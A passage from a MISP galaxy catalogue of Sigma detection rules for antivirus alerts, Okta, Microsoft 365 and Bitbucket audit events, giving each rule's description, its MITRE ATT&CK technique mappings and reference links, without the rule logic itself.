The tag is: misp-galaxy:sigma-rules="Antivirus Password Dumper Detection"

Antivirus Password Dumper Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 11134. Table References

Links

https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448

https://www.nextron-systems.com/?s=antivirus

https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619

https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_password_dumper.yml

Antivirus Relevant File Paths Alerts

Detects an Antivirus alert in a highly relevant file path or with a relevant file name

The tag is: misp-galaxy:sigma-rules="Antivirus Relevant File Paths Alerts"

Antivirus Relevant File Paths Alerts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obtain Capabilities - T1588" with estimative-language:likelihood-probability="almost-certain"

Table 11135. Table References

Links

https://www.nextron-systems.com/?s=antivirus

https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_relevant_files.yml

Antivirus Exploitation Framework Detection

Detects a highly relevant Antivirus alert that reports an exploitation framework

The tag is: misp-galaxy:sigma-rules="Antivirus Exploitation Framework Detection"

Antivirus Exploitation Framework Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 11136. Table References

Links

https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797

https://www.nextron-systems.com/?s=antivirus

https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466

https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424

https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_exploiting.yml

Antivirus Hacktool Detection

Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool

The tag is: misp-galaxy:sigma-rules="Antivirus Hacktool Detection"

Antivirus Hacktool Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

Table 11137. Table References

Links

https://www.nextron-systems.com/?s=antivirus

https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_hacktool.yml

Antivirus Web Shell Detection

Detects a highly relevant Antivirus alert that reports a web shell. It’s highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.

The tag is: misp-galaxy:sigma-rules="Antivirus Web Shell Detection"

Antivirus Web Shell Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 11138. Table References

Links

https://github.com/tennc/webshell

https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection

https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection

https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection

https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection

https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection

https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection

https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection

https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection

https://www.nextron-systems.com/?s=antivirus

https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml

Suspicious SQL Query

Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields

The tag is: misp-galaxy:sigma-rules="Suspicious SQL Query"

Suspicious SQL Query has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="SQL Stored Procedures - T1505.001" with estimative-language:likelihood-probability="almost-certain"

Table 11140. Table References

Links

https://github.com/sqlmapproject/sqlmap

https://github.com/SigmaHQ/sigma/tree/master/rules/category/database/db_anomalous_query.yml

Okta FastPass Phishing Detection

Detects when Okta FastPass prevents a known phishing site.

The tag is: misp-galaxy:sigma-rules="Okta FastPass Phishing Detection"

Okta FastPass Phishing Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

Table 11141. Table References

Links

https://sec.okta.com/fastpassphishingdetection

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_fastpass_phishing_detection.yml

Okta New Admin Console Behaviours

Detects when Okta identifies new activity in the Admin Console.

The tag is: misp-galaxy:sigma-rules="Okta New Admin Console Behaviours"

Okta New Admin Console Behaviours has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11143. Table References

Links

https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_new_behaviours_admin_console.yml

Okta Suspicious Activity Reported by End-user

Detects when an Okta end-user reports activity by their account as being potentially suspicious.

The tag is: misp-galaxy:sigma-rules="Okta Suspicious Activity Reported by End-user"

Okta Suspicious Activity Reported by End-user has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1586.003" with estimative-language:likelihood-probability="almost-certain"

Table 11144. Table References

Links

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/okta/workflows-templates/blob/master/workflows/suspicious_activity_reported/readme.md

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_suspicious_activity_enduser_report.yml

Okta User Account Locked Out

Detects when an user account is locked out.

The tag is: misp-galaxy:sigma-rules="Okta User Account Locked Out"

Okta User Account Locked Out has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 11145. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml

Okta Identity Provider Created

Detects when a new identity provider is created for Okta.

The tag is: misp-galaxy:sigma-rules="Okta Identity Provider Created"

Okta Identity Provider Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"

Table 11146. Table References

Links

https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_identity_provider_created.yml

Okta Application Sign-On Policy Modified or Deleted

Detects when an application Sign-on Policy is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Okta Application Sign-On Policy Modified or Deleted"

Table 11150. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml

Okta Admin Role Assignment Created

Detects when a new admin role assignment is created. Which could be a sign of privilege escalation or persistence

The tag is: misp-galaxy:sigma-rules="Okta Admin Role Assignment Created"

Table 11151. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assignment_created.yml

Okta Admin Role Assigned to an User or Group

Detects when an the Administrator role is assigned to an user or group.

The tag is: misp-galaxy:sigma-rules="Okta Admin Role Assigned to an User or Group"

Okta Admin Role Assigned to an User or Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003" with estimative-language:likelihood-probability="almost-certain"

Table 11152. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml

New Okta User Created

Detects new user account creation

The tag is: misp-galaxy:sigma-rules="New Okta User Created"

Table 11153. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_created.yml

Potential Okta Password in AlternateID Field

Detects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files.

The tag is: misp-galaxy:sigma-rules="Potential Okta Password in AlternateID Field"

Potential Okta Password in AlternateID Field has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

Table 11155. Table References

Links

https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data

https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_password_in_alternateid_field.yml

Okta Network Zone Deactivated or Deleted

Detects when an Network Zone is Deactivated or Deleted.

The tag is: misp-galaxy:sigma-rules="Okta Network Zone Deactivated or Deleted"

Table 11157. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml

Okta MFA Reset or Deactivated

Detects when an attempt at deactivating or resetting MFA.

The tag is: misp-galaxy:sigma-rules="Okta MFA Reset or Deactivated"

Okta MFA Reset or Deactivated has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication - T1556.006" with estimative-language:likelihood-probability="almost-certain"

Table 11159. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml

Okta Policy Modified or Deleted

Detects when an Okta policy is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Okta Policy Modified or Deleted"

Table 11160. Table References

Links

https://developer.okta.com/docs/reference/api/event-types/

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml

Okta User Session Start Via An Anonymising Proxy Service

Detects when an Okta user session starts where the user is behind an anonymising proxy service.

The tag is: misp-galaxy:sigma-rules="Okta User Session Start Via An Anonymising Proxy Service"

Okta User Session Start Via An Anonymising Proxy Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"

Table 11161. Table References

Links

https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection

https://developer.okta.com/docs/reference/api/system-log/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_session_start_via_anonymised_proxy.yml

Disabling Multi Factor Authentication

Detects disabling of Multi Factor Authentication.

The tag is: misp-galaxy:sigma-rules="Disabling Multi Factor Authentication"

Disabling Multi Factor Authentication has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 11162. Table References

Links

https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/audit/microsoft365_disabling_mfa.yml

New Federated Domain Added

Detects the addition of a new Federated Domain.

The tag is: misp-galaxy:sigma-rules="New Federated Domain Added"

New Federated Domain Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003" with estimative-language:likelihood-probability="almost-certain"

Table 11163. Table References

Links

https://o365blog.com/post/aadbackdoor/

https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/audit/microsoft365_new_federated_domain_added_audit.yml

New Federated Domain Added - Exchange

Detects the addition of a new Federated Domain.

The tag is: misp-galaxy:sigma-rules="New Federated Domain Added - Exchange"

New Federated Domain Added - Exchange has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003" with estimative-language:likelihood-probability="almost-certain"

Table 11164. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa21-008a

https://o365blog.com/post/aadbackdoor/

https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html

https://www.sygnia.co/golden-saml-advisory

https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/exchange/microsoft365_new_federated_domain_added_exchange.yml

Activity from Anonymous IP Addresses

Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.

The tag is: misp-galaxy:sigma-rules="Activity from Anonymous IP Addresses"

Activity from Anonymous IP Addresses has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"

Table 11165. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_from_anonymous_ip_addresses.yml

Data Exfiltration to Unsanctioned Apps

Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.

The tag is: misp-galaxy:sigma-rules="Data Exfiltration to Unsanctioned Apps"

Data Exfiltration to Unsanctioned Apps has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537" with estimative-language:likelihood-probability="almost-certain"

Table 11166. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_data_exfiltration_to_unsanctioned_app.yml

Suspicious Inbox Forwarding

Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.

The tag is: misp-galaxy:sigma-rules="Suspicious Inbox Forwarding"

Suspicious Inbox Forwarding has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

Table 11167. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_susp_inbox_forwarding.yml

Activity Performed by Terminated User

Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.

The tag is: misp-galaxy:sigma-rules="Activity Performed by Terminated User"

Table 11168. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_by_terminated_user.yml

Logon from a Risky IP Address

Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.

The tag is: misp-galaxy:sigma-rules="Logon from a Risky IP Address"

Logon from a Risky IP Address has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11169. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_logon_from_risky_ip_address.yml

PST Export Alert Using New-ComplianceSearchAction

Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.

The tag is: misp-galaxy:sigma-rules="PST Export Alert Using New-ComplianceSearchAction"

PST Export Alert Using New-ComplianceSearchAction has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"

Table 11170. Table References

Links

https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml

Microsoft 365 - Unusual Volume of File Deletion

Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.

The tag is: misp-galaxy:sigma-rules="Microsoft 365 - Unusual Volume of File Deletion"

Microsoft 365 - Unusual Volume of File Deletion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 11171. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_unusual_volume_of_file_deletion.yml

Microsoft 365 - User Restricted from Sending Email

Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.

The tag is: misp-galaxy:sigma-rules="Microsoft 365 - User Restricted from Sending Email"

Microsoft 365 - User Restricted from Sending Email has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"

Table 11172. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_user_restricted_from_sending_email.yml

Suspicious OAuth App File Download Activities

Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.

The tag is: misp-galaxy:sigma-rules="Suspicious OAuth App File Download Activities"

Table 11173. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_susp_oauth_app_file_download_activities.yml

Microsoft 365 - Impossible Travel Activity

Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.

The tag is: misp-galaxy:sigma-rules="Microsoft 365 - Impossible Travel Activity"

Microsoft 365 - Impossible Travel Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11174. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_impossible_travel_activity.yml

Microsoft 365 - Potential Ransomware Activity

Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.

The tag is: misp-galaxy:sigma-rules="Microsoft 365 - Potential Ransomware Activity"

Microsoft 365 - Potential Ransomware Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

Table 11175. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_potential_ransomware_activity.yml

PST Export Alert Using eDiscovery Alert

Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content

The tag is: misp-galaxy:sigma-rules="PST Export Alert Using eDiscovery Alert"

PST Export Alert Using eDiscovery Alert has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"

Table 11176. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_pst_export_alert.yml

Activity from Infrequent Country

Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn’t recently or never visited by any user in the organization.

The tag is: misp-galaxy:sigma-rules="Activity from Infrequent Country"

Activity from Infrequent Country has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"

Table 11177. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_from_infrequent_country.yml

Activity from Suspicious IP Addresses

Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.

The tag is: misp-galaxy:sigma-rules="Activity from Suspicious IP Addresses"

Activity from Suspicious IP Addresses has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"

Table 11178. Table References

Links

https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy

https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_detection/microsoft365_from_susp_ip_addresses.yml

Bitbucket Unauthorized Access To A Resource

Detects unauthorized access attempts to a resource.

The tag is: misp-galaxy:sigma-rules="Bitbucket Unauthorized Access To A Resource"

Bitbucket Unauthorized Access To A Resource has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Accounts - T1586" with estimative-language:likelihood-probability="almost-certain"

Table 11179. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_unauthorized_access_detected.yml

Bitbucket Global SSH Settings Changed

Detects Bitbucket global SSH access configuration changes.

The tag is: misp-galaxy:sigma-rules="Bitbucket Global SSH Settings Changed"

Bitbucket Global SSH Settings Changed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"

Table 11180. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_ssh_settings_change_detected.yml

Bitbucket Secret Scanning Exempt Repository Added

Detects when a repository is exempted from secret scanning feature.

The tag is: misp-galaxy:sigma-rules="Bitbucket Secret Scanning Exempt Repository Added"

Bitbucket Secret Scanning Exempt Repository Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11181. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_secret_scanning_exempt_repository_detected.yml

Bitbucket User Permissions Export Attempt

Detects user permission data export attempt.

The tag is: misp-galaxy:sigma-rules="Bitbucket User Permissions Export Attempt"

Bitbucket User Permissions Export Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Identify Roles - T1591.004" with estimative-language:likelihood-probability="almost-certain"

Table 11182. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_permissions_export_attempt_detected.yml

Bitbucket Audit Log Configuration Updated

Detects changes to the bitbucket audit log configuration.

The tag is: misp-galaxy:sigma-rules="Bitbucket Audit Log Configuration Updated"

Bitbucket Audit Log Configuration Updated has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11183. Table References

Links

https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_log_configuration_update_detected.yml

Bitbucket Secret Scanning Rule Deleted

Detects when secret scanning rule is deleted for the project or repository.

The tag is: misp-galaxy:sigma-rules="Bitbucket Secret Scanning Rule Deleted"

Bitbucket Secret Scanning Rule Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11184. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_secret_scanning_rule_deleted.yml

Bitbucket Full Data Export Triggered

Detects when full data export is attempted.

The tag is: misp-galaxy:sigma-rules="Bitbucket Full Data Export Triggered"

Bitbucket Full Data Export Triggered has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"

Table 11185. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_full_data_export_triggered.yml

Bitbucket Global Permission Changed

Detects global permissions change activity.

The tag is: misp-galaxy:sigma-rules="Bitbucket Global Permission Changed"

Bitbucket Global Permission Changed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11186. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/global-permissions-776640369.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_permissions_change_detected.yml

Bitbucket Project Secret Scanning Allowlist Added

Detects when a secret scanning allowlist rule is added for projects.

The tag is: misp-galaxy:sigma-rules="Bitbucket Project Secret Scanning Allowlist Added"

Bitbucket Project Secret Scanning Allowlist Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11187. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_project_secret_scanning_allowlist_added.yml

Bitbucket User Login Failure Via SSH

Detects SSH user login access failures. Please note that this rule can be noisy and is recommended to use with correlation based on "author.name" field.

The tag is: misp-galaxy:sigma-rules="Bitbucket User Login Failure Via SSH"

Bitbucket User Login Failure Via SSH has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11188. Table References

Links

https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html

https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_login_failure_via_ssh_detected.yml

Bitbucket Unauthorized Full Data Export Triggered

Detects when full data export is attempted an unauthorized user.

